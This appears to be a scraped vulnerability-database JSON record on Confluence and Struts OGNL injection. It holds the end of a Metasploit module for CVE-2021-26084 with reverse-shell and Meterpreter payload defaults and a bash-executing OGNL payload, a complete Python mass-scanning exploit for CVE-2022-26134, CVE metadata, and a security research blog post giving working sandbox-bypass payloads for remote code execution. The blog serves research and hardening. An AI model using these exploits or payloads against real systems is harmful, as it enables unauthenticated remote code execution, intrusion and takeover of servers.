\n'Privileged' => false, # Tomcat user \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_bash' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 8090 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ \n# /var/atlassian/application-data/confluence/analytics-logs/*.atlassian-analytics.log \n# /var/atlassian/application-data/confluence/logs/atlassian-confluence.log \nIOC_IN_LOGS, \nARTIFACTS_ON_DISK # CmdStager \n] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \ntoken1 = rand_text_alphanumeric(8..16) \ntoken2 = rand_text_alphanumeric(8..16) \ntoken3 = rand_text_alphanumeric(8..16) \n \nres = inject_ognl(\"#{token1}'+'#{token2}'+'#{token3}\") \n \nreturn CheckCode::Unknown unless res \n \nunless res.code == 200 && res.body.include?(\"#{token1}#{token2}#{token3}\") \nreturn CheckCode::Safe('Failed to test OGNL injection.') \nend \n \nCheckCode::Vulnerable('Successfully tested OGNL injection.') \nend \n \ndef exploit \nprint_status(\"Executing #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nres = inject_ognl(ognl_payload(cmd)) \n \nunless res&.code == 200 && res.body.match?(/queryString.*Process.*pid.*exitValue/) \nfail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\") \nend \n \nvprint_good(\"Successfully executed command: #{cmd}\") \nend \n \ndef inject_ognl(ognl) \nsend_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/pages/createpage-entervariables.action'), \n'vars_post' => { \n# https://commons.apache.org/proper/commons-ognl/apidocs/org/apache/commons/ognl/JavaCharStream.html \n# https://github.com/jkuhnert/ognl/blob/f4e18cda6a89bcdad15c617c0d94013a854a1e93/src/main/java/ognl/JavaCharStream.java#L324-L341 \n'queryString' => Rex::Text.to_hex(ognl, '\\\\u00') \n} \n) \nend \n \ndef ognl_payload(cmd) \n# https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#expression-language-el---code-execution \n# https://www.tutorialspoint.com/java/lang/class_forname_loader.htm \n# https://docs.oracle.com/javase/7/docs/api/java/lang/ProcessBuilder.html \n# https://docs.oracle.com/javase/8/docs/api/java/util/Base64.Decoder.html \n<<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '') \n'+Class.forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval(' \nnew java.lang.ProcessBuilder( \n\"/bin/bash\", \n\"-c\", \nnew java.lang.String( \njava.util.Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\") \n) \n).start() \n')+' \nOGNL \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/164122/atlassian_confluence_webwork_ognl_injection.rb.txt"}, {"lastseen": "2022-06-07T16:53:40", "description": "", "cvss3": {}, "published": "2022-06-07T00:00:00", "type": "packetstorm", "title": "Confluence OGNL Injection Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T00:00:00", "id": "PACKETSTORM:167430", "href": "https://packetstormsecurity.com/files/167430/Confluence-OGNL-Injection-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/python3 \n \n# Exploit Title: Confluence Pre-Auth Remote Code Execution via OGNL Injection \n# Google Dork: N/A \n# Date: 06/006/2022 \n# Exploit Author: h3v0x \n# Vendor Homepage: https://www.atlassian.com/ \n# Software Link: https://www.atlassian.com/software/confluence/download-archives \n# Version: All < 7.4.17 versions before 7.18.1 \n# Tested on: - \n# CVE : CVE-2022-26134 \n# https://github.com/h3v0x/CVE-2022-26134 \n \nimport sys \nimport requests \nimport optparse \nimport multiprocessing \n \nfrom requests.packages import urllib3 \nfrom requests.exceptions import MissingSchema, InvalidURL \nurllib3.disable_warnings() \n \nrequestEngine = multiprocessing.Manager() \nsession = requests.Session() \n \nglobal paramResults \nparamResults = requestEngine.list() \nglobals().update(locals()) \n \ndef spiderXpl(url): \nglobals().update(locals()) \nif not url.startswith('http'): \nurl='http://'+url \n \nheaders = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\", \n\"Connection\": \"close\", \n\"Accept-Encoding\": \"gzip, deflate\"} \n \ntry: \nresponse = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False) \nif(response.status_code == 302): \nprint('Found: '+url+' // '+ response.headers['X-Cmd-Response']) \n \ninputBuffer = str(response.headers['X-Cmd-Response']) \nparamResults.append('Vulnerable application found:'+url+'\\n''Command result:'+inputBuffer+'\\n') \nelse: \npass \n \nexcept requests.exceptions.ConnectionError: \nprint('[x] Failed to Connect: '+url) \npass \nexcept multiprocessing.log_to_stderr: \npass \nexcept KeyboardInterrupt: \nprint('[!] Stoping exploit...') \nexit(0) \nexcept (MissingSchema, InvalidURL): \npass \n \n \ndef banner(): \nprint('[-] CVE-2022-26134') \nprint('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \\n') \n \n \ndef main(): \nbanner() \n \nglobals().update(locals()) \n \nsys.setrecursionlimit(100000) \n \nif not optionsOpt.filehosts: \nurl = optionsOpt.url \nspiderXpl(url) \nelse: \nf = open(optionsOpt.filehosts) \nurls = map(str.strip, f.readlines()) \n \nmultiReq = multiprocessing.Pool(optionsOpt.threads_set) \ntry: \nmultiReq.map(spiderXpl, urls) \nmultiReq.close() \nmultiReq.join() \nexcept UnboundLocalError: \npass \nexcept KeyboardInterrupt: \nexit(0) \n \n \nif optionsOpt.output: \nprint(\"\\n[!] Saving the output result in: %s\" % optionsOpt.output) \n \nwith open(optionsOpt.output, \"w\") as f: \nfor result in paramResults: \nf.write(\"%s\\n\" % result) \nf.close() \n \nif __name__ == \"__main__\": \nparser = optparse.OptionParser() \n \nparser.add_option('-u', '--url', action=\"store\", dest=\"url\", help='Base target uri (ex. http://target-uri/)') \nparser.add_option('-f', '--file', dest=\"filehosts\", help='example.txt') \nparser.add_option('-t', '--threads', dest=\"threads_set\", type=int,default=10) \nparser.add_option('-m', '--maxtimeout', dest=\"timeout\", type=int,default=8) \nparser.add_option('-o', '--output', dest=\"output\", type=str, default='exploit_result.txt') \nparser.add_option('-c', '--cmd', dest=\"command\", type=str, default='id') \noptionsOpt, args = parser.parse_args() \n \nmain() \n \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/167430/CVE-2022-26134.py.txt"}], "prion": [{"lastseen": "2023-11-20T23:31:01", "description": "A vulnerability has been identified in Mendix Forgot Password Appstore module (All versions >= V3.3.0 < V3.5.1), Mendix Forgot Password Appstore module (Mendix 7 compatible) (All versions < V3.2.2). Initial passwords are generated in an insecure manner. This could allow an unauthenticated remote attacker to efficiently brute force passwords in specific situations.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-08T12:15:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26314"], "modified": "2022-03-11T19:04:00", "id": "PRION:CVE-2022-26314", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-26314", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T02:30:07", "description": "Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "source": "nvd@nist.gov", "type": "Primary", "impactScore": 5.9}, "published": "2018-08-22T13:29:00", "type": "prion", "title": "Remote code execution", "bulletinFamily": "NVD", "cvss2": {"baseSeverity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-06-12T07:15:00", "id": "PRION:CVE-2018-11776", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2018-11776", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T00:42:35", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-30T07:15:00", "type": "prion", "title": "Code injection", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-08-08T14:21:00", "id": "PRION:CVE-2021-26084", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-26084", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-20T23:30:49", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T22:15:00", "type": "prion", "title": "Code injection", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-08-08T14:22:00", "id": "PRION:CVE-2022-26134", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2022-26134", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "github": [{"lastseen": "2023-01-27T17:06:16", "description": "## Overview[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#overview>)\n\nObject Graph Notation Language (OGNL) is a popular, Java-based, expression language used in popular frameworks and applications, such as Apache Struts and Atlassian Confluence. In the past, OGNL injections led to some serious remote code execution (RCE) vulnerabilities, such as the [Equifax breach](<https://www.synopsys.com/blogs/software-security/equifax-apache-struts-vulnerability-cve-2017-5638/>), and over the years, protection mechanisms and mitigations against OGNL injections have been developed and improved to limit the impact of these vulnerabilities.\n\nIn this blog post, I will describe how I was able to bypass certain OGNL injection protection mechanisms, including the one used by Struts and the one used by Atlassian Confluence. The purpose of this blog post is to share different approaches used when analyzing this kind of protection so they can be used to harden similar systems.\n\nNo new OGNL injections are being reported as part of this research, and unless future OGNL injections are found on the affected frameworks/applications, or known double evaluations affect an existing Struts application, this research does not constitute any immediate risk for Apache Struts or Atlassian Confluence.\n\n## Hello OGNL, my old friend[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#hello-ognl-my-old-friend>)\n\nI have a past history of bugs found in Struts framework, including [CVE-2016-3087](<https://cwiki.apache.org/confluence/display/WW/S2-033>), [CVE-2016-4436](<https://cwiki.apache.org/confluence/display/WW/S2-035>), [CVE-2017-5638](<https://cwiki.apache.org/confluence/display/WW/S2-046>), [CVE-2018-1327](<https://cwiki.apache.org/confluence/display/WW/S2-056>), [CVE-2020-17530](<https://cwiki.apache.org/confluence/display/WW/S2-061>) and even some [double OGNL injections](<https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2/>) through both Velocity and FreeMarker tags that remain unfixed to this date. Therefore, I have become familiar with the OGNL sandbox and different escapes over the years and I am still interested in any OGNL-related vulnerabilities that may appear. That was the case with Atlassian Confluence, [CVE-2021-26084](<https://jira.atlassian.com/browse/CONFSERVER-67940>) and [CVE-2022-26134](<https://jira.atlassian.com/browse/CONFSERVER-79016>), where the former is an instance of the unresolved double evaluation via Velocity tags mentioned in my [2020 advisory](<https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2/>).\n\nMy friend, Man Yue Mo, wrote a [great article](<https://securitylab.github.com/research/ognl-apache-struts-exploit-CVE-2018-11776/>) describing how the OGNL mitigations have been evolving over the years and there are few other posts that also describe in detail how these mitigations have been improving.\n\nIn 2020, disabling the sandbox became harder, so I decided to change the approach completely. I introduced new ways to get RCE by circumventing the sandbox, and using the application server\u2019s Instance Manager to instantiate arbitrary objects that I could use to achieve RCE. This research was presented at our Black Hat 2020 talk, [Scribbling outside of template security](<https://i.blackhat.com/USA-20/Wednesday/us-20-Munoz-Room-For-Escape-Scribbling-Outside-The-Lines-Of-Template-Security-wp.pdf>). We reported this issue to the Apache Struts team, and they [fixed](<https://github.com/apache/struts/commit/8d3393f09a06ff4a2b6827b6544524d1d6af3c7c>) the issue by using a block list. However, in 2021, Chris McCown published a [new bypass technique](<https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html>) which leverages the OGNL\u2019s AST maps and the Apache Commons Collections BeanMap class.\n\nThat was it\u2013at that point I had enough of OGNL and stopped looking into it until two events happened in the same week:\n\n * My friend, [Mert](<https://twitter.com/mertistaken>), found what he thought was an SSTI in a bug bounty program. It turned out to be an OGNL injection, so he asked me to help him with the exploitation of the issue.\n * I read several tweets claiming that [CVE-2022-26134](<https://jira.atlassian.com/browse/CONFSERVER-79016>) was not vulnerable to RCE on the latest Confluence version (7.18.0 at that time).\n\nOkay, OGNL, my old friend. Here we go again.\n\n## Looking at Confluence `isSafeExpression` protection[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#looking-at-confluence-issafeexpression-protection>)\n\nWhen the CVE-2022-26134 was released there was an initial understanding that the [OGNL injection could not lead to direct RCE in the latest version 7.18.0](<https://twitter.com/httpvoid0x2f/status/1532924239216627712>) since the `isSafeExpression` method was not possible to bypass for that version\n\n![Screenshot of a tweet from user @httpvoid0x2f on June 4, 2022 that reads, \"As you might have noticed most recent version instances won't give you a code execution. This is due to isSafeExpression\$\$ protections and the fact only ${} notation is being evaluated and there's no straight forward way to confirm this due to injection being blind.\" ](https://github.blog/wp-content/uploads/2023/01/image1-5.png?w=594&resize=594%2C295)\n\nHarsh Jaiswal ([@rootxharsh](<https://twitter.com/rootxharsh>)) and Rahul Maini ([@iamnoooob](<https://twitter.com/iamnoooob>)) took a different approach and looked for a gadget chain in the allowed classes list that could allow them to create an admin account.\n\n![The picture shows a road with two ways: bypassing the isSafeExpression method or finding a gadget in the allowed list. The car chooses the latter.](https://github.blog/wp-content/uploads/2023/01/image7-1.png?w=500&resize=500%2C507)\n\nSoon after, [@MCKSysAr](<https://twitter.com/MCKSysAr>) found a [nice and simple bypass](<https://twitter.com/MCKSysAr/status/1533053536430350337>):\n\n 1. Use `Class` property instead of `class` one.\n 2. Use string concatenation to bypass string checks.\n\n \n![Payload used by MCKSysAr to bypass Confluence sandbox](https://github.blog/wp-content/uploads/2023/01/image4-2.png?w=1024&resize=1024%2C165) \n\n\nMCKSysAr\u2019s bypass was soon addressed by blocking the access to the `Class` and `ClassLoader` properties. I had some other ideas, so I decided to take a look at the `isSafeExpression` implementation.\n\nThe first interesting thing I learned was that this method was actually parsing the OGNL expression into its AST form in order to analyze what it does and decide whether it should be allowed to be executed or not. Bye-bye to regexp-based bypasses.\n\nThen the main logic to inspect the parsed tree was the following:\n\n * Starting at the root node of the AST tree, recursively call `containsUnsafeExpression()` on each node of the tree.\n * If the node is an instance of `ASTStaticField`, `ASTCtor` or `ASTAssign` then the expression is deemed to be unsafe. This will prevent payloads using the following vectors: \n * Static field accesses\n * Constructors calls\n * Variable assignments\n * If the node is an `ASTStaticMethod` check that the class the method belongs to is in an allow list containing: \n * `net.sf.hibernate.proxy.HibernateProxy`\n * `java.lang.reflect.Proxy`\n * `net.java.ao.EntityProxyAccessor`\n * `net.java.ao.RawEntity`\n * `net.sf.cglib.proxy.Factory`\n * `java.io.ObjectInputValidation`\n * `net.java.ao.Entity`\n * `com.atlassian.confluence.util.GeneralUtil`\n * `java.io.Serializable`\n * If node is an `ASTProperty` checks block list containing (after the initial fix): \n * `class`\n * `Class`\n * `classLoader`\n * `ClassLoader`\n * If the property looks like a class name, check if the class's namespace is defined in the `unsafePackageNames` block list (too long to list here).\n * If node is an `ASTMethod`, check if we are calling `getClass` or `getClassLoader`.\n * If node is an `ASTVarRef`, check if the variable name is in `UNSAFE_VARIABLE_NAMES` block list: \n * `#application`\n * `#parameters`\n * `#request`\n * `#session`\n * `#_memberAccess`\n * `#context`\n * `#attr`\n * If node in an `ASTConst` (eg: a string literal), call `isSafeExpressionInternal` which will check the string against a block list (for example, harmful class names) and, in addition, it will parse the string literal as an OGNL expression and apply the `containsUnsafeExpression()` recursive checks on it.\n * If a node has children, repeat the process for the children.\n\nThis is a pretty comprehensive control since it parses the AST recursively and makes sure that any AST nodes considered harmful are either rejected or inspected further.\n\nMCKSysAr bypass was based on two things: A) `Class` and `ClassLoader` properties were not accounted for when inspecting `ASTProperty` nodes; and B) `\u201djava.lang.\u201d + \u201cRuntime\u201d` was parsed as an `ASTAdd` node with two `ASTConst` children. None of them matched any of the known harmful strings and when parsed as an OGNL expression, none of them were valid expressions so they were not parsed further. A) Was fixed quickly by disallowing access to `Class` and `ClassLoader` properties, but B) was not fixed since it was considered as a security in-depth control (it's impossible to analyze all variants in which a malicious string could be written).\n\nWith that in mind I took a look at the[ list of the OGNL AST nodes](<https://github.com/orphan-oss/ognl/tree/master/src/main/java/ognl>) to see if there was anything interesting that was not accounted for in the `isSafeExpression()` method.\n\n### Enter `ASTEval`[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#enter-asteval>)\n\nThe first one that got my attention was `ASTEval`. It looked very interesting and it was not accounted for by the `containsUnsafeExpression()` method.\n\n`ASTEval` are nodes in the form of `(expr)(root)` and they will parse the `expr` string into a new AST and evaluate it with `root` as its root node. This will allow us to provide an OGNL expression in the form of a string `(ASTConst)` and evaluate it! We know that `ASTConst` nodes are parsed as OGNL expressions and verified to not be harmful. However, we already saw that if we split the string literal in multiple parts, only the individual parts will be checked and not the result of the concatenation. For example, for the payload below `#application` will never get checked, only `#` and `application` which are deemed to be safe:\n\n \n![An AST tree of the expression showing all the AST nodes the expression is parsed into.](https://github.blog/wp-content/uploads/2023/01/image5-2.png?w=484&resize=484%2C263) \n\n\nAs you can see in the resulting tree, there are no hints of any `ASTVarRef` node and therefore access to `#application` is granted.\n\n### Weaponizing `ASTEval`[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#weaponizing-asteval>)\n\nThere are multiple ways to craft a payload levering this vector. For example, we could get arbitrary RCE with echoed response:\n \n \n ('(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@get'+'Runtime().exec(\"id\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Cmd-Response\",#a))')('')\n \n \n\n![The screenshot shows a response from the Confluence server including an `X-Cmd-Response` which shows the output of the `id` command.](https://github.blog/wp-content/uploads/2023/01/image3-4.png?w=1024&resize=1024%2C332)\n\n### Enter `ASTMap`, `ASTChain` and `ASTSequence`[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#enter-astmap-astchain-and-astsequence>)\n\nI was already familiar with `ASTMap`s from reading [Mc0wn's great article](<https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html>). In a nutshell, OGNL allows developers to instantiate any `java.util.Map` implementation by using the `@<class_name>@{}` syntax.\n\nUsing this technique, we were able to use a `BeanMap` (a map wrapping a Java bean and exposing its getters and setters as map entries) to bypass the `getClass` limitation by rewriting the payload as:\n \n \n \n BeanMap map = @org.apache.commons.beanutils.BeanMap@{};\n \n map.setBean(\u201c\u201d)\n \n map.get(\u201cclass\u201d).forName(\u201djavax.script.ScriptEngineManager\u201d).newInstance().getEngineByName(\u201cjs\u201d).eval(payload)\n \n \n\nThis payload avoids calling the `BeanMap` constructor explicitly and, therefore, gets rid of the `ASTCtor` limitation. In addition, it allows us to call `Object.getClass()` implicitly by accessing the `class` item. However, we still have another problem: we need to be able to assign the map to a variable (`map`) so we can call the `setBean()` method on it and later call the `get()` method on the same map. Since `ASTAssign` was blocked, assignments were not an option. Fortunately, looking through the list of AST nodes, two more nodes got my attention: `ASTChain` and `ASTSequence`.\n\n * `ASTChain` allows us to pass the result of one evaluation as the root node of the next evaluation. For example: `(one).(two)` will evaluate `one` and use its result as the root for the evaluation of `two`.\n * `ASTSequence` allows us to run several evaluations on the same root object in sequence. For example: `one, two` will evaluate `one` and then `two` using the same root node.\n\nThe idea was to bypass `ASTAssign` constraint by combining `ASTChain` and `ASTSequence` together\n\nWe can set the map returned by the `ASTMap` expression as the root for a sequence of expressions so all of them will have the map as its root object:\n \n \n \n (#@BeanMap@{}).(expression1, expression2)\n \n \n\nIn our case, `expression1` is the call to `setBean()` and `expression2` is the call to `get()`.\n\nTaking that into account and splitting literal strings into multiple parts to bypass the block list we got the following payload:\n \n \n \n (#@org.apache.commons.beanutils.BeanMap@{}).(setBean(''),get('cla'+'ss').forName('javax'+'.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('7*7'))\n \n \n\nThe final AST tree bypassing all `isSafeExpression` checks is:\n\n \n![An AST tree of the payload showing all the AST nodes the expression is parsed into.](https://github.blog/wp-content/uploads/2023/01/image2-5.png?w=1024&resize=1024%2C496) \n\n\nThere was a final problem to solve. The OGNL injection sink was `translateVariable()` which resolves OGNL expressions wrapped in `${expressions}` delimiters. Therefore, our payload was not allowed to contain any curly brackets. Fortunately, for us, [OGNL will replace unicode escapes](<https://github.com/apache/commons-ognl/blob/master/src/main/jjtree/ognl.jjt#L36-L37>) for us so we were able to use the final payload:\n \n \n \n (#@org.apache.commons.beanutils.BeanMap@\\\\u007b\\\\u007d).(setBean(''),get('cla'+'ss').forName('javax'+'.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('7*7'))\n \n \n\nI submitted these bypasses to Atlassian through its bug bounty program and, even though I was not reporting any new OGNL injections but a bypass of its sandbox, they were kind enough to award me with a $3,600 bounty!\n\n## Looking into Struts2[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#looking-into-struts2>)\n\nAs mentioned before, a friend found what he thought was a Server-Side Template Injection (SSTI) (`%{7*7}` => 49) but it turned out to be an OGNL injection. Since this happened as part of a bug bounty program, I didn\u2019t have access to the source code. I can't be sure if the developers were passing untrusted data to an OGNL sink (for example, `[ActionSupport.getText()](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ActionSupport.html#getText-java.lang.String->)`), or if it was some of the [unfixed double evaluations issues](<https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2/>) (still working at the time of writing). Anyhow, the application seemed to be using the latest Struts version and known payloads were not working. I decided to take a deeper look.\n\n### New gadgets on the block[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#new-gadgets-on-the-block>)\n\nWhen I listed what objects were available I was surprised to find that many of the usual objects in the Struts OGNL context, such as the value stack, were not there, and some others I haven't seen before were available. One of such objects was `#request[\u2018.freemarker.TemplateModel\u2019]`. This object turned out to be an instance of `org.apache.struts2.views.freemarker.ScopesHashModel` containing a variety of new objects. One of them (stored under the `ognl` key) gave me access to an `org.apache.struts2.views.jsp.ui.OgnlTool` instance. Looking at the code for this class I quickly spotted that it was calling `Ognl.getValue()`. This class is not part of Struts, but the OGNL library and, therefore, the Struts sandbox (member access policy) was not enabled! In order to exploit it I used the following payload:\n \n \n \n #request[\u2018.freemarker.TemplateModel\u2019].get(\u2018ognl\u2019).getWrappedObject().findValue(\u2018(new freemarker.template.utility.Execute()).exec({\u201cwhoami\u201d})\u2019, {})\n \n \n\nThat was enough to get the issue accepted as a remote code execution in the bounty program. However, despite having achieved RCE, there were a few unsolved questions:\n\n * Why was this `.freemarker.TemplateModel` object available?\n * Are there any other ways to get RCE on the latest Struts versions?\n\n### Post-invocations Context[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#post-invocations-context>)\n\nAttackers are limited to the objects they are able to access. Normally, OGNL injections take place before the action invocation completes and the action\u2019s `Result` is rendered.\n\n![Diagram of Struts request handling. It shows how an action is invoked and the different components involved.](https://github.blog/wp-content/uploads/2023/01/image6-2.png?w=640&fit=1024%2C1024)https://struts.apache.org/core-developers/attachments/Struts2-Architecture.png\n\nWhen grepping the Struts\u2019s source code for `.freemarker.TemplateModel`, I found out that there are plenty of new objects added to the request scope when preparing the action\u2019s `Result` in order to share them with the view layer (JSP, FreeMarker or Velocity) and `.freemarker.TemplateModel` was [one of them](<https://github.com/apache/struts/blob/266d2d4ed526edbb8e8035df94e94a1007d7c360/core/src/main/java/org/apache/struts2/views/freemarker/FreemarkerManager.java#L122>). However, those objects are only added after the `ActionInvocation` has 